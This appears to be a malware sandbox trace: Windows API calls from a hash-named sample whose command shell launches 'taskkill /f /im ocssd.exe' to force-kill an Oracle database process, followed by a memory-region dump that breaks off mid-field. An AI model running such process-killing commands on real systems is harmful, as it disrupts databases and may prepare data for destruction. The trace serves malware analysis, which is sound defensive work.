[0155.249] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0155.249] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0155.249] GetProcessHeap () returned 0x5f0000 [0155.249] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x110) returned 0x5faf40 [0155.249] GetProcessHeap () returned 0x5f0000 [0155.249] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x218) returned 0x5fb058 [0155.254] GetProcessHeap () returned 0x5f0000 [0155.254] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x5fb058, Size=0x112) returned 0x5fb058 [0155.254] GetProcessHeap () returned 0x5f0000 [0155.254] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x5fb058) returned 0x112 [0155.254] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0155.254] GetProcessHeap () returned 0x5f0000 [0155.254] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xe0) returned 0x5fb178 [0155.256] GetProcessHeap () returned 0x5f0000 [0155.256] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x5fb178, Size=0x76) returned 0x5fb178 [0155.256] GetProcessHeap () returned 0x5f0000 [0155.256] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x5fb178) returned 0x76 [0155.256] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0155.256] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0155.257] GetLastError () returned 0x2 [0155.257] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0155.257] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x5fb1f8 [0155.258] GetProcessHeap () returned 0x5f0000 [0155.258] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x14) returned 0x5f7538 [0155.258] FindClose (in: hFindFile=0x5fb1f8 | out: hFindFile=0x5fb1f8) returned 1 [0155.258] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0155.258] GetLastError () returned 0x2 [0155.258] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x5fb1f8 [0155.258] GetProcessHeap () returned 0x5f0000 [0155.258] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x5f7538, Size=0x4) returned 0x5fb238 [0155.258] FindClose (in: hFindFile=0x5fb1f8 | out: hFindFile=0x5fb1f8) returned 1 [0155.259] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0155.259] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0155.259] GetConsoleTitleW (in: lpConsoleTitle=0x19f7fc, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0155.261] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f728, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f70c | out: lpAttributeList=0x19f728, lpSize=0x19f70c) returned 1 [0155.261] UpdateProcThreadAttribute (in: lpAttributeList=0x19f728, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f714, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f728, lpPreviousValue=0x0) returned 1 [0155.261] GetStartupInfoW (in: lpStartupInfo=0x19f760 | out: lpStartupInfo=0x19f760*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x154, hStdOutput=0x158, hStdError=0x130)) [0155.261] GetProcessHeap () returned 0x5f0000 [0155.261] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x18) returned 0x5f75f8 [0155.262] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0155.262] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0155.262] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0155.262] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0155.262] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0155.262] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0155.262] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0155.262] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0155.262] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0155.262] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0155.262] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0155.262] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0155.262] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0155.262] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0155.262] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0155.262] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0155.262] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0155.262] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0155.262] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0155.262] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0155.262] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0155.263] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0155.263] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0155.263] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0155.263] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0155.263] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0155.263] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0155.263] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0155.263] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0155.263] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0155.263] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0155.263] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0155.263] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0155.263] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0155.263] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0155.263] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0155.263] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0155.263] GetProcessHeap () returned 0x5f0000 [0155.263] RtlFreeHeap (HeapHandle=0x5f0000, Flags=0x0, BaseAddress=0x5f75f8) returned 1 [0155.263] GetProcessHeap () returned 0x5f0000 [0155.263] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xa) returned 0x5fb1f8 [0155.263] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0155.270] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill /f /im ocssd.exe ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f6b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill /f /im ocssd.exe ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f6fc | out: lpCommandLine="taskkill /f /im ocssd.exe ", lpProcessInformation=0x19f6fc*(hProcess=0x9c, hThread=0x98, dwProcessId=0xe38, dwThreadId=0x58c)) returned 1 [0155.290] CloseHandle (hObject=0x98) returned 1 [0155.291] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0155.291] GetProcessHeap () returned 0x5f0000 [0155.291] RtlFreeHeap (HeapHandle=0x5f0000, Flags=0x0, BaseAddress=0x5f9e40) returned 1 [0155.291] GetEnvironmentStringsW () returned 0x5f9e40* [0155.291] GetProcessHeap () returned 0x5f0000 [0155.291] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xa76) returned 0x5fbd40 [0155.291] FreeEnvironmentStringsA (penv="=") returned 1 [0155.291] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) returned 0x0 [0156.866] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x19f694 | out: lpExitCode=0x19f694*=0x80) returned 1 [0156.866] CloseHandle (hObject=0x9c) returned 1 [0156.867] _vsnwprintf (in: _Buffer=0x19f77c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f69c | out: _Buffer="00000080") returned 8 [0156.867] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000080") returned 1 [0156.867] GetProcessHeap () returned 0x5f0000 [0156.868] RtlFreeHeap (HeapHandle=0x5f0000, Flags=0x0, BaseAddress=0x5fbd40) returned 1 [0156.868] GetEnvironmentStringsW () returned 0x5fb248* [0156.868] GetProcessHeap () returned 0x5f0000 [0156.868] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xa9c) returned 0x5fbcf0 [0156.868] FreeEnvironmentStringsA (penv="=") returned 1 [0156.868] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0156.868] GetProcessHeap () returned 0x5f0000 [0156.869] RtlFreeHeap (HeapHandle=0x5f0000, Flags=0x0, BaseAddress=0x5fbcf0) returned 1 [0156.869] GetEnvironmentStringsW () returned 0x5fb248* [0156.869] GetProcessHeap () returned 0x5f0000 [0156.869] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xa9c) returned 0x5fbcf0 [0156.869] FreeEnvironmentStringsA (penv="=") returned 1 [0156.869] GetProcessHeap () returned 0x5f0000 [0156.869] RtlFreeHeap (HeapHandle=0x5f0000, Flags=0x0, BaseAddress=0x5fb1f8) returned 1 [0156.869] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f728 | out: lpAttributeList=0x19f728) [0156.869] _get_osfhandle (_FileHandle=1) returned 0x158 [0156.869] SetConsoleMode (hConsoleHandle=0x158, dwMode=0x0) returned 0 [0156.869] _get_osfhandle (_FileHandle=1) returned 0x158 [0156.869] GetConsoleMode (in: hConsoleHandle=0x158, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0156.869] _get_osfhandle (_FileHandle=0) returned 0x154 [0156.869] GetConsoleMode (in: hConsoleHandle=0x154, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0156.869] GetConsoleOutputCP () returned 0x1b5 [0156.872] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0156.872] SetThreadUILanguage (LangId=0x0) returned 0x409 [0156.877] exit (_Code=128) Thread: id = 161 os_tid = 0x520 Process: id = "21" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x3310e000" os_pid = "0xe38" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "20" os_parent_pid = "0x1304" cmd_line = "taskkill /f /im ocssd.exe " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1920 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1921 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1922 start_va = 0x40000 end_va = 0x43fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1923 start_va = 0x50000 end_va = 0x65fff monitored = 0 entry_point = 0x5de80 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\SysWOW64\\taskkill.exe" (normalized: "c:\\windows\\syswow64\\taskkill.exe") Region: id = 1924 start_va = 0x70000 end_va = 0x406ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 1925 start_va = 0x4070000 end_va = 0x4084fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004070000" filename = "" Region: id = 1926 start_va = 0x4090000 end_va = 0x40cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 1927 start_va = 0x40d0000 end_va = 0x410ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 1928 start_va = 0x4110000 end_va = 0x4110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004110000" filename = "" Region: id = 1929 start_va = 0x4120000 end_va = 0x4121fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 1930 start_va = 0x4200000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 1931 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1932 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1933 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1934 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1935 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 1936 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1937 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 1938 start_va = 0x4500000 end_va = 0x450ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004500000" filename = "" Region: id = 1939 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1940 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1941 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1942 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1943 start_va = 0x4510000 end_va = 0x473ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004510000" filename = "" Region: id = 1944 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1945 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1946 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1947 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1948 start_va = 0x4130000 end_va = 0x41edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1949 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1950 start_va = 0x74650000 end_va = 0x746cafff monitored = 0 entry_point = 0x7466e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1951 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1952 start_va = 0x4400000 end_va = 0x443ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 1953 start_va = 0x4440000 end_va = 0x447ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004440000" filename = "" Region: id = 1954 start_va = 0x76ae0000 end_va = 0x76b23fff monitored = 0 entry_point = 0x76af9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1955 start_va = 0x75260000 end_va = 0x7530cfff monitored = 0 entry_point = 0x75274f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1956 start_va = 0x74450000 end_va = 0x7446dfff monitored = 0 entry_point = 0x7445b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1957 start_va = 0x74440000 end_va = 0x74449fff monitored = 0 entry_point = 0x74442a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1958 start_va = 0x74590000 end_va = 0x745e7fff monitored = 0 entry_point = 0x745d25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1959 start_va = 0x77450000 end_va = 0x77596fff monitored = 0 entry_point = 0x77461cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1960 start_va = 0x76b30000 end_va = 0x76c7efff monitored = 0 entry_point = 0x76be6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1961 start_va = 0x753c0000 end_va = 0x75451fff monitored = 0 entry_point = 0x753f8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1962 start_va = 0x77290000 end_va = 0x7744cfff monitored = 0 entry_point = 0x77372a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1963 start_va = 0x75310000 end_va = 0x7536efff monitored = 0 entry_point = 0x75314af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1964 start_va = 0x77240000 end_va = 0x77284fff monitored = 0 entry_point = 0x7725de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1965 start_va = 0x6cda0000 end_va = 0x6cda7fff monitored = 0 entry_point = 0x6cda17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 1966 start_va = 0x6cd80000 end_va = 0x6cd95fff monitored = 0 entry_point = 0x6cd821d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 1967 start_va = 0x6ccb0000 end_va = 0x6cceefff monitored = 0 entry_point = 0x6ccc46c0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 1968 start_va = 0x6c9a0000 end_va = 0x6cadefff monitored = 0 entry_point = 0x6c9cd880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 1969 start_va = 0x6cd60000 end_va = 0x6cd7bfff monitored = 0 entry_point = 0x6cd64720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 1970 start_va = 0x6cd50000 end_va = 0x6cd59fff monitored = 0 entry_point = 0x6cd528d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 1971 start_va = 0x4480000 end_va = 0x44fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004480000" filename = "" Region: id = 1972 start_va = 0x4480000 end_va = 0x44a9fff monitored = 0 entry_point = 0x4485680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1973 start_va = 0x44f0000 end_va = 0x44fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044f0000" filename = "" Region: id = 1974 start_va = 0x4740000 end_va = 0x48c7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004740000" filename = "" Region: id = 1975 start_va = 0x74ea0000 end_va = 0x74ecafff monitored = 0 entry_point = 0x74ea5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1976 start_va = 0x48d0000 end_va = 0x4a50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000048d0000" filename = "" Region: id = 1977 start_va = 0x4a60000 end_va = 0x5e5ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004a60000" filename = "" Region: id = 1978 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1979 start_va = 0x41f0000 end_va = 0x41f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041f0000" filename = "" Region: id = 1980 start_va = 0x4480000 end_va = 0x4484fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui") Region: id = 1981 start_va = 0x4490000 end_va = 0x4490fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004490000" filename = "" Region: id = 1982 start_va = 0x44a0000 end_va = 0x44a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044a0000" filename = "" Region: id = 1983 start_va = 0x5e60000 end_va = 0x6196fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1984 start_va = 0x44b0000 end_va = 0x44effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044b0000" filename = "" Region: id = 1985 start_va = 0x4510000 end_va = 0x454ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004510000" filename = "" Region: id = 1986 start_va = 0x4550000 end_va = 0x4639fff monitored = 0 entry_point = 0x458d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1987 start_va = 0x4640000 end_va = 0x473ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004640000" filename = "" Region: id = 1988 start_va = 0x4550000 end_va = 0x4553fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004550000" filename = "" Region: id = 1989 start_va = 0x4560000 end_va = 0x463ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 1990 start_va = 0x76e20000 end_va = 0x76e2bfff monitored = 0 entry_point = 0x76e23930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 1991 start_va = 0x61a0000 end_va = 0x61a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000061a0000" filename = "" Region: id = 1992 start_va = 0x76c80000 end_va = 0x76d03fff monitored = 0 entry_point = 0x76ca6220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 1993 start_va = 0x61b0000 end_va = 0x61b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000061b0000" filename = "" Region: id = 1994 start_va = 0x6cca0000 end_va = 0x6ccacfff monitored = 0 entry_point = 0x6cca3520 region_type = mapped_file name = "wbemprox.dll" filename = 